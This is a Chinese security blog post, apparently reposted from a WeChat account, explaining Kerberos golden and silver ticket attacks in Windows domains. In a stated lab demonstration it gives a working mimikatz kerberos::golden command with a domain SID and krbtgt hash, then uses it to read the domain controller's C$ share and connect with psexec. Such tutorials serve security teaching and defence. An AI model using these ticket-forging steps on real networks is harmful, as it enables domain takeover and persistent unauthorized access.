内网域渗透 | 金银票据传递攻击(Pass The Ticket)

admin 2024年12月10日17:47:07评论15 views字数 1751阅读5分50秒阅读模式
转自:韭要学安全

前置知识

Kerberos是一种计算机的认证协议,在域中,依旧使用kerberos作为认证手段。他提供了一种单点登录(SSO)的方法,比如打印服务器、邮件服务器和文件服务器。这些服务器都有认证的需求,很自然的,不可能让每个服务器自己实现一套认证系统,而是提供一个中心认证服务器(AS-Authentication Server)供这些服务器使用,这样任何客户端就只需要维护一个密码就能登录所有服务器。

角色:

客户端(Client)、身份认证服务(AS)、票据授予服务(TGS)、普通服务器(Server

金银票据攻击

黄金票据、白银票据攻击是基于kerberos认证协议的攻击方式,常用来做后渗透域控权限维持。由于用户正常访问资源是也会请求服务票证,因此黄金、白银票据攻击具备很高的隐蔽性。

kerberos认证中,主要解决两个问题

第一个问题:如何证明你本人是XXX用户的问题。(身份问题,黄金票据所在的问题,AS负责)

第二个问题:提供服务的服务器如何知道你有权限访问它提供的服务。当一个Client去访问Server服务器上的服务时,Server如何判断Client是否有权限来访问自己主机上的服务。(白银票据所在的问题,TGS负责)

内网域渗透 | 金银票据传递攻击(Pass The Ticket)

Kerberos协议认证流程

Kerberos协议的基本流程是Client先通过AS(身份认证服务)进行身份认证,认证通过后AS会给Client一个TGT(票据授权票),Client将获取到的TGT发送到TGS(票据授予服务)进行身份验证,验证通过后TGS会给Client一个ST(服务票据),Client通过这个ST去访问指定Server上的服务。

内网域渗透 | 金银票据传递攻击(Pass The Ticket)

伪造黄金票据

kerberos认证中,Client通过AS认证后,AS会给Client一个TGT,而TGT是通过域控服务器上krbtgt账户的Hash进行加密的,所以只有得到krbtgtHash,就可以伪造TGT来进入下一步ClientTGS的交互。而在有了黄金票据后,就跳过AS验证,不用验证账户和密码,所以也不担心域管来修改密码。意思就是,当攻击者能够获得krbtgtHash后,攻击者就可以伪造一张票据授权票,去伪造成域内的任意用户访问域内kerberos认证的所有服务。

内网域渗透 | 金银票据传递攻击(Pass The Ticket)

下面是黄金票据演示(虚拟机实验环境演示,切勿带入实战):

环境:

域控windows server 2012 ip:192.168.4.136

域内主机 win7 (伪造方)ip:192.168.4.138

 feng.com

下面是域控上操作

权限维持krbtgt权限

内网域渗透 | 金银票据传递攻击(Pass The Ticket)

以管理员运行mimikatz

内网域渗透 | 金银票据传递攻击(Pass The Ticket)

内网域渗透 | 金银票据传递攻击(Pass The Ticket)

下面是win7操作

dir \WIN-T09MBKM9HIT.feng.comc$

内网域渗透 | 金银票据传递攻击(Pass The Ticket)

然后正常运行mimikatz

kerberos::golden /user:administrator /domain:feng.com /sid:S-1-5-21-2149019885-2061172686-904760113 /krbtgt:d0bea82cce69a2090f7309c418df2df2 /ptt

内网域渗透 | 金银票据传递攻击(Pass The Ticket)

dir \WIN-T09MBKM9HIT.feng.comc$

内网域渗透 | 金银票据传递攻击(Pass The Ticket)

拿到票据能读c盘,然后用psexec直接连

内网域渗透 | 金银票据传递攻击(Pass The Ticket)

成功了。。。

要进行下一个白银票据实验记得删除票据,执行klist purge就行

内网域渗透 | 金银票据传递攻击(Pass The Ticket)

下面附上黄金票据演示视频:

黄金票据和白银票据的区别

1.访问权限不同

黄金票据:伪造票据授权票(TGT),可以获取任何kerberos服务权限。

白银票据:伪造服务票据,只能访问指定的服务。

2.加密方式不同

黄金票据:由krbtgtNTLM Hash加密。

白银票据:由服务账号(通胀为计算机账户)的NTLM Hash加密。

3.认证流程不同

黄金票据:利用过程需要访问域控。

白银票据:不需要访问域控。

文章内容为个人笔记,部分内容为网上复制粘贴的,如有雷同或侵权,可以公众号联系我删除文章。

文章仅供学习参考,过程也是利用本地虚拟机演示,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者和本公众号无关。

注:如有侵权请联系删除
内网域渗透 | 金银票据传递攻击(Pass The Ticket)

   学习更多技术,关注我:  

觉得文章不错给点个‘再看’吧

原文始发于微信公众号(哪都通安全):内网域渗透 | 金银票据传递攻击(Pass The Ticket)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月10日17:47:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网域渗透 | 金银票据传递攻击(Pass The Ticket)https://cn-sec.com/archives/1990623.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息